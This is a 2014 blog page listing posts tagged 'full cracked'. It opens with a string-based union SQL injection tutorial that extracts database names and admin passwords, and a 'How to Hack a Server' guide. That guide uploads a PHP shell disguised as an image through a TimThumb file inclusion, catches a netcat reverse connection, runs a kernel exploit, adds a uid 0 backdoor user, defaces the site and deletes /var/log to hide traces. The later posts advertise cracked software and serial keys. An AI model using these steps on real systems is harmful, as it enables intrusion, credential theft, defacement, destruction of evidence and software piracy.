Latest Posts
Showing posts with label full cracked. Show all posts
Showing posts with label full cracked. Show all posts

09 July 2014

String Based SQL injection

What is String Based SQL injection and how to notice them?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:

Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)



Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with SQLi
Code:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query
Code:
id=X' order by--+

Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we


String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
Results show error, so we'll assume as 10 columns, since it'll be an example for our process

2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3.Obtaining the Tables from the current Database
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"

4.Obtaining Column names from a specific table (which in this example is "admin")
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5.Obtaining Data from Column names
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection
Read more ...

04 July 2014

How to Hack a Server

Tutorial on Web Hacking by 4n0nkh4n

Web-Hacking is my favorite topic that I could easily discuss for hours.

When I had the idea to expand our Blog’s topics (not only Apple, iPhone, iPad, little tips on Mac and Windows etc….) and add more hacking information, tutorials etc….
So, today I decided to make a good start by creating this post-tutorial: How to Hack a Server
Everything you need to know….

Tools you need:

- Backtrack (Backtrack Website)
- Firefox (get it from here….) – Included in Backtrack and Ubuntu
- Netcat (Included in Backtrack)   — If you are on other linux enviroments get it from here….
- iCon2PHP (Get it from here….)
- A good shell (iCon2PHP Archive includes three great shells)
- A good VPN or Tor (More explanation below…..)
- Acunentix Web Vulnerability Scanner (google it or contact us)

About the Tools:

Backtrack
– Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers.
(Just a little tip: To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet)
Firefox
– Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking.
Netcat
– Netcat is a powerful networking tool. You will need this to root the server….
iCon2PHP & Good Shells
– iCon2PHP is a tool I created and you will use it if you upload the image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available.
Good VPN or TOR (Proxies are good too…)
– While hacking you need to be anonymous so as not to find you (even if you forget to delete the logs….). A VPN stands for Virtual Private Network and what it does is: hiding your IP, encrypting the data you send and receive to and from the Internet. A good VPN solution for Windows Maschines is ProXPN. However, with VPN connections (especially when you are under a free VPN connection) your connection speen is really slow. So, I wouldn’t recommend VPN except if you pay and get a paid account.
What I would recommend is Tor. Tor can be used from its bundle: Vidalia, which is a great tool for Windows, Mac and Linux that uses Proxies all over its network around the world so as to keep you anonymous and changing these Proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don’t want to pay for a Paid VPN account
Apart from Tor, simple Proxies are good but I wouldn’t recommend them as much as I would for Tor.
                — If I listed the above options according to their reliability :                                 
1. Paid VPN Account at ProXPN
2. Tor
3. Free VPN Account at ProXPN
4. Proxy Connection
Acunetix Web Vulnerability Scanner
– Acunetix is (maybe the best) Vulnerability Scanner. It scans for open ports, vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows if it is a small or big vulnerability.
The Consultant Edition (For unlimited websites) costs about 3000-7000$.
____________________________________________________________

Starting the Main Tutorial:

So, here is the route we will follow:
Find a Vulnerable Website –> Upload a c100 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks

- – -  Before we begin  – - -

-Boot to Backtrack
-Connect to your VPN or to Tor.
-Open Firefox.

1. Finding a Vulnerable Website and Information about it:

Crack Acunetix . Open and scan the  website (use the standard profile – don’t modify anything except if you know what you are doing). For this tutorial our website will be: http://www.site.com (not very innovative, I know….)
Let’s say we find a vulnerability where we can upload a remote file (our shell) and have access to the website’s files.
The Warning should be something like this. It can mention other information or be a completely other warning (like for SQL Injection – I will post a Tutorial on this also…), too! (Depends on the Vulnerability) What we need at this tutorial is that we can exploit the ‘File Inclusion Attack’ and Have access to the Website’s Files. (This is not the warning we need for this tutorial, but it is related to what we do too.)
OK. Now, we have the site and the path that the vulnerability is. In our example let’s say it is here:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php
The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven’t updated to the latest version of TimThumb, which is a image-editing service on websites.
OK. Acunetix should also mention the OS of the Server. Assuming that ours is a Unix/Linux system (so as to show you how to root it).
For now, we don’t need anything more from Acunetix.

2. Uploading the shell:

Till now, we know:
-The website’s blog has a huge vulnerability at TimThumb.
-It is hosted on a Unix System.
Next, because of the fact that the Vulnerability is located at an outdated TimThumb version, and timthumb is a service to edit images, we need to upload the shell instead of the image.
Thus, download any image (I would recommend a small one) from Google Images. We don’t care what it shows.
Generate Output with iCon2PHP
Copy your Image and your Shell to the Folder that iCon2PHP is located.
Run the Program and follow the in-program instructions to build the ‘finalImage.php’.
To avoid any errors while uploading rename the ‘finalImage.php’ to ‘image.php;.png(instead of png, type the image format your image was – jpeg,jpg,gif….) This is the exactly same file but it confuses the uploader and thinks that it actually is an image.
iCon2PHP Terminal Output:
[...]
Enter the Path of your Image:   image.png
Please enter the path to the PHP:   GnYshell.php
Entered!
Valid Files!
[...]
File: ‘finalImage.php’ has been successfully created at the Current Directory…
Upload Output to a Server:
Next, upload your ‘image.php;.png’ at a free server. (000webhost, 0fees etc….)
Go to the vulnerability and type at the URL:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png
It would be better to create a subdomain like “flickr.com(or other big image-hosting service) because sometimes it doesn’t accept images from other websites.
Website…. Shelled!

OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.

3. Root the Server:

Now that you have shelled your website we can start the proccess to root the server.
What is rooting when it comes for Server Hacking?
—> Rooting a server is the proccedure when the hacker acquires root priviliges at the whole server. If you don’t understand this yet, I reasure you that by the end of the section “Rooting a server” you will have understood exactly what it is…
Let’s procceed to rooting….
Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:
netcat
4. Now type:
-l -n -v -p 402
5.It should have an output like this:
listening on [any] 402 port
6. Now, go to the Back-Connection function at the Shell.
7. Complete with the following:
Host:YouIPAddress Port: 402 (or the port you forwarded….)
8. Hit connect and… Voila! Connected to the server!
Downloading and Executing the Kernel exploit:
1. Now, if you type:
whoami
you will see that you are not root yet…
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploits here….
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped….
4. Now do the following exploit preparations:
– The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)
(( If the program is in C you have first to compile it by typing: gcc exploit.c -o exploit ))
– Change the permissions of the exploit:
chmod 777 exploit
5. Execute the exploit. Type:
./exploit
6. Root permissions acquired! Type this to ensure:
id
or
whoami
7. Add a new root user:
adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username
8. Change the password of the new root user:
passwd root1
SUCCESSFULLY ROOTED!

4. Deface the Website:

What is defacing?
Defacing is the proccedure when the hacker uploads his own inbox webpage to alter the homepage of a site. In this way, he can boost his reputation or parse a message to the people or the company (which owns the website…).
Since you got the website shelled, you just create a nice hacky page in html and upload it via the Shell as inbox.html (Delete or rename the website’s one…)

5. Cover your tracks:

Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you we have to delete logs.
First of all, Unix based-Maschines have some logs that you have better to either edit or delete.
Common Linux log files name and their usage:
/var/log/message: General message and system related stuff
/var/log/auth.log: Authenication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files
In short /var/log is the location where you should find all Linux logs file.
To delete all of them by once type:
su root1
rm -rf /var/log
mkdir /var/log
Read more ...

27 March 2014

DVDFab 9.1.3.1 Final With Cracked Dll

DVDFab 9.1.3.1 Final 

Cracked Dll

Copy Any Blu-ray to Blu-ray/DVD/AVCHD Disc or Hard Drive
Copy any Blu-ray
DVDFab Blu-ray Copy removes all known copy protections including the newest MKB and bus encryption; removes BD-Live, and UOPs. So it can decrypt and copy any Blu-ray.
Burn existing Blu-ray folder or ISO file
DVDFab Blu-ray Copy can also burn the existing Blu-ray file folder or ISO image file on your computer to disc.
Backup Blu-ray to hard drive
Want to burn Blu-ray, but no target disc at hand? No matter, you can backup your Blu-ray to your hard drive as Blu-ray folder or ISO image file for later burning.
Burn to any blank Blu-ray/DVD/AVCHD disc
DVDFab Blu-ray Copy can burn your Blu-ray movie to any blank Blu-ray disc like BD-R 25, BD-RE 25, BD-R 50 and BD-RE 50. A notable feature of Blu-ray Copy is that it can burn Blu-ray to any blank DVD disc like DVD+R/RW, DVD-R/RW, DVD+R DL and DVD-R DL to save money or if no Blu-ray disc is available at hand or you prefer high cost-performance DVD backup. What's more, it can backup your Blu-ray t o AVCHD disc while you need to choose output a s BD5 o r BD9. Please note that the output DVD/AVCHD discs can only be played in Blu-ray Player in this case.
Copy Blu-ray with or without Compression
Make perfect 1:1 Blu-ray clone
Copy BD-50 t o BD-50, Copy BD-25 t o BD-25 in 1:1 ratio without any loss.
Copy Blu-ray with compression
Compress BD-50 to BD-25, BD-9 o r BD-5 completely with outstanding output quality.
Remove HD audio to save space
When copying content to smaller than the original media with compression, Blu-ray Copy will remove HD audio t o allow more space and reduce the amount of video compression. Blu-ray Copy will remove the HD audio by converting Dolby TrueHD to Dolby AC-3, DTS-HD audio to DTS.
4 Copy Modes and Many Settings Available
4 copy modes for you to customize your Blu-ray copy
4 copy modes are available for you to customize your Blu-ray copy: "Full Disc" copies the whole content including all movies, menus and trailers; "Main Movie" just copies the longest movie title; “Customize” allows you to copy whichever movie titles you like; "Clone/Burn" makes perfect 1:1 bit-to-bit copy of Blu-ray or burn Blu-ray Folder/ISO onto disc.
Flexible settings cater to your copy needs
It gives you the ability to set a lot of things according to your needs for Blu-ray copy, such as write speed, burning engine, encoding speed, audio 
and subpicture tracks, etc.
Designed for Ease of Use
Provide multi-conveniences
DVDFab Blu-ray Copy, like the entire DVDFab product family, has many settings for user convenience, including multi-language support, built-in Blu-ray Preview window and more. And you will be informed automatically once there is a new version.
Very easy to operate
Blu-ray Copy is easy to use even for new users, with an intuitive, step-by-step process layout. For more experienced users, Blu-ray Copy has the power to customize the copy experience.

Supported Formats

Input
Blu-ray-Video disc, Blu-ray folder, ISO image file
Output
Blu-ray video disc, AVCHD disc, Blu-ray folder, ISO image file

System Requirements

★ Windows 8/7/Vista/XP (32-bit/64-bit)
★ Pentium II 500 MHz
★ 512 MB of RAM
★ 20 GB of Free Hard Disk Space
★ A DVD-R(W) or DVD+R(W) Drive 
★ Internet connection required to register DVDFab 9 products (little network traffic used).
Read more ...

Aleo Flash Intro Banner Maker v3.8 With Crack And Serial Key

Aleo Flash Intro Banner Maker v3.8
Create Flash Intros, Flash banners, Flash slideshows and ecards in just a few clicks!

Flash Intro and Banner Maker is a Flash authoring tool to help you create Flash intros, AD banners and ecards with ease. There is no need for knowledge of Flash development studio and Actionscripts, all you need is to input texts and select from premade customizable background effects and text animation effects. The properties of texts are customizable, including font style, size, width and height scale, transparency, rotation, border, fill style etc. 

Key Features
* Wizard style user interface, extremely easy to use; 
* Customize width, height, frame rate of Flash movie; 
* Add border to Flash movie; 
* Add MP3 or WAV file to Flash movie as background sound effect; 
* Add preloader to Flash movie; 
* Add multiple images or Flash movies to background; 
* Lots of background effects to select from, all of them are customizable; 
* Add multiple background effects to Flash movie; 
* Set background of Flash movie as transparent, solid color, linear gradient color, radial gradient color; 
* Display images as dynamic effects, or display as static images on background;
* Display texts as dynamic effects, or display as static texts on background;
* Display animated texts and images one by another, or set up incoming time and duration time of each text or image respectively.
* Unlimited stages of animated text and image effects;
* Unlimited lines of text effect in one stage; 
* Customize font style, size, width and height scale, transparency, rotation, border of text, set fill style of text as solid color, linear gradient color and radial gradient color; 
* Set different font style of texts in one line; 
* Lots of text animation effects to select from, all of them are customizable; 
* Set web link of texts; 
* Customize timing of text effect; 
* Open web page when Flash movie stops or when user clicks on Flash movie; 
* Publish Movie as Flash SWF, GIF image and AVI video. 
* Generate HTML code to include Flash movie in your web page.
Read more ...

MediaMonkey Gold 4.1.1.1700 With Crack And Serial Key, Incl Patch

MediaMonkey Gold 4.1.1.1700 Only Serial Key
Read more ...

AIDA64 Extreme / Business / Engineer Edition 4.30.2900 With Serial Key With Crack Incl Patch

AIDA64 Extreme / Business / Engineer Edition 4.30.2900 
With Serial Key Only
Read more ...

Hotspot Shield Elite v3.37 Incl Fix Crack With Adblock

Hotspot Shield Elite v3.37
Read more ...

26 March 2014

K-Lite Codec Pack 10.4.0 Mega/Full/Basic/Standard + Update (2014) PC

 
 
 
INFORMATION:

Title : K-Lite Codec Pack
Developer: Sodecguide
Version: 10.4.0
Version Update: 10.4.0
Language: English
Tablet: Not required


http://www.codecguide.com/download_other.htm
 
 
SYSTEM REQUIREMENTS:

image


DESCRIPTION:

K-Lite Codec Pack - in various versions contains all the most popular codecs for playback and video encoding ( except for versions of Basic). QuickTime Alternative and Real Alternative are additional packages in order to play the respective formats and contain the basic components of the official players .
Update This update applies to all packages of the series, namely for K-Lite Codec Pack 10.1.5 in various versions (Lite, Basic, Standard, Full, Mega Codec Pack).


ADDITIONAL INFORMATION:

K-Lite Codec Pack Standard - has everything to play most multimedia files. This package should be enough for the average user .
K-Lite Codec Pack Full - except codecs, filters and tools that are standard also contains all the necessary things for encoding video and audio. May be useful for advanced users and professionals.
K-Lite Mega Codec Pack - This version of the package contains all the codecs and programs that are included in the full version , plus QuickTime Alternative and Real Alternative.


FEATURES OF PACKAGE:

Latest version of the best codecs.
All components are chosen so that there were no conflicts between them.
Installation is very simple , if you wish , you can choose only those codecs and tools that you really need.
At any time you can completely or partially remove the package, while leaving no trace of his stay, including registry keys.
Each pack is tested for the presence of possible conflicts between codecs and other programs .
K-Lite Codec Pack is trying to avoid problems between new and already installed codecs on your computer , and can even solve some of the existing ones.
Changelog
Updated MPC-HC to version 1.7.3.147
Updated LAV Filters to version 0.61.1- 3 -g528effc
Updated madVR to version 0.87.7
Updated xy-VSFilter to version 3.0.0.284

Screens:

image

image

image

image
Read more ...

25 March 2014

Driver Magician 4.1 With Serial Key And Crack

About

Driver Magician offers a professional solution for device drivers backup, restoration, update and removal in Windows operating system. It identifies all the hardware in the system, extracts their associated drivers from the hard disk and backs them up to a location of your choice. Then when you format and reinstall/upgrade your operating system, you can restore all the "saved" drivers just as if you had the original driver diskettes in your hands. After one system reboot, your PC will be loaded and running with the required hardware drivers.

What's more, Driver Magician has a built in database of the latest drivers with the ability to go to the Internet to receive the driver updates. It saves lots of time to find the correct drivers and mature drivers will obviously increase the performance of hardware. If there are unknown devices in your PC, Driver Magician helps you detect them easily and quickly with its built in hardware identifier database.

Features
  •  Back up device drivers of your computer in four modes.
  •  Restore device drivers from backup in one mouse click.
  •  Update device drivers of your PC to improve system performance and stability.
  •  Uninstall device drivers
  •  Live Update device identifier database and driver update database.
  •  Detect unknown devices.
  •  Back up more items such as My Documents and Desktop.
  •  Restore more items from backup.
  •  Get detailed information of the hardware drivers.
  •  Clone all drivers to an auto-setup package (.exe), so you can restore drivers without installing Driver Magician. 
Read more ...

Your Uninstaller PRO v7.5.2014.03 With Serial Key And Crack

Your Uninstaller PRO v7.5.2014.03 
With Serial Key And Crack
Read more ...

23 March 2014

SoftOrbits Icon Maker 1.0 With Crack And Serial Key, Incl Patch


SoftOrbits Icon Maker 1.0 
With Crack And Serial Key
Information About Software - Click Here

Create, modify and generate application icons with SoftOrbits Icon Maker! Offering everything you need to design, edit and convert small graphics, SoftOrbits Icon Maker is a must-have tool for any application developer. Even if you can't draw, the tool will help you produce great looking icons out of any picture, automatically applying effects to create icons with normal, highlighted, active and disabled look.

Create Icons for Windows, Android and iOS Applications

No two platforms are the same. Windows, OS X, Android, iOS and many other platforms use icons developed to their very own specifications. Did you know about 32-bit, 256x256 pixel icons in PNG format used throughout Windows 7 and 8? Are you aware of HD icons sized up to 1024x1024 pixels used in Mac OS X? Do you know the difference between iOS and Android icons?
Whether you are developing a desktop or mobile application, SoftOrbits Icon Maker will help you produce icons conforming to all the requirements of your target system. With SoftOrbits Icon Maker you don't have to remember the difference between iPhone icons and icons used in Android apps or bother about the different formats and sizes of icons used in Windows and Mac OS applications.

Comprehensive Icon Editing

SoftOrbits Icon Maker comes with some of the most comprehensive graphic editing features you could expect from an icon editor. Crop, rotation, drawing and pixel-level editing tools are all available to enable you create some of the best looking icons.

Stunning Special Effects

With SoftOrbits Icon Maker you can easily enhance your icons with a wide range of special effects. You can sharpen icons or add blur, change brightness and saturation, and use more than 20 other special effects available in the built-in editor. You can colorize icons, add shadows and glow, create active and disabled versions of icons, and use a wide range of geometric correction and distortion controls.

Automatic Icon Generation

With SoftOrbits Icon Maker you won't have to draw each individual icon size. Instead, you can use a large master image, automatically producing smaller versions of that image for the platform of your choice. Moreover, SoftOrbits Icon Maker is well aware of the different file formats required for the different platforms. As an example, Windows 7 makes use of the PNG format for high-resolution icons while still employing the older ICO format for smaller sizes. SoftOrbits Icon Maker will automatically produce images using the correct combination of resolution and file format.

Animated Icons and Cursors

SoftOrbits Icon Maker supports animated icons (.ani) and cursors (.cur), allowing you to edit multiple frames and generate animated sequences in no time.

Convert Images to Icons

Already have a high-resolution picture and just need to make icons? SoftOrbits Icon Maker will automatically produce icons in all sizes and formats required by the target system based on a single master image. Start with the largest size, and SoftOrbits Icon Maker will automatically downsample the master image to produce all the required icons for your selected platform in just a few clicks.

Automatic Icon Creation in Batch Mode

SoftOrbits Icon Maker comes with a powerful batch mode, allowing you to apply pre-defined effects and produce system icons for your target platform out of a batch of different images. The batch mode can do as much as taking a bunch of images and producing normal, disabled, active and highlighted versions of icons in all sizes and color depths required for your target platform.

Import Icon Libraries from ICL, DLL and EXE

SoftOrbits Icon Maker can import icons from a variety of icon libraries including ICL, DLL and EXE files, make icons out of JPEG, TIFF, GIF, BMP and PNG files, and import many other graphic formats.
Read more ...

Prevent Recovery 6.51 With Incl Serial Key, Patch And Crack

Prevent Recovery 6.51 
With Incl Serial Key, Patch And Crack
Read more ...
Designed By Published.. Blogger Templates